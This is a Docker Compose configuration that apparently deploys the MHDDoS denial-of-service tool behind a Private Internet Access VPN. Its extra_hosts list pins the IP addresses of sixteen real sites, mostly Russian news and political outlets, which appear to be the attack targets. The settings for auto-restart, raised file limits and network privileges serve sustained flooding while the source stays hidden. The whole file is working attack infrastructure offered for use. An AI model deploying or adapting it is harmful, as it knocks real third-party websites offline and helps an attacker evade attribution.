version: '2.4'
services:
 ptndown-mhddos-pia:
  build:
    args:
      PIA_USER: ${PIA_USER}
      PIA_PASS: ${PIA_PASS}
    context: .
    dockerfile: Dockerfile
  cap_add:
    - NET_ADMIN
  devices:
    - /dev/net/tun
  dns:
    - 77.88.8.1
    - 77.88.8.2
  extra_hosts:
    - 360tv.ru:95.213.164.20
    - 47news.ru:77.244.221.63
    - anews.com:88.212.236.76
    - donbasstoday.ru:193.233.15.62
    - www.donnews.ru:185.179.190.159
    - dontimes.ru:87.236.16.17
    - fine-news.ru:213.139.208.57
    - lug-info.com:185.12.125.139
    - mosregtoday.ru:178.154.213.69
    - novorossiia.ru:136.243.2.150
    - politcentr.ru:87.236.16.126
    - politexpert.net:188.124.36.76
    - rostovgazeta.ru:5.188.73.213
    - russia-insider.com:158.69.116.70
    - sbarro-pizza.ru:185.165.123.36
    - therussophile.org:3.66.136.156
  image: fluxstate/ptndown-mhddos-pia
  restart: unless-stopped
  sysctls:
    - net.ipv4.tcp_timestamps=0
    - net.ipv6.conf.all.disable_ipv6=1
    - net.ipv6.conf.default.disable_ipv6=1
  ulimits:
    nofile:
      soft: 1048576
      hard: 1048576
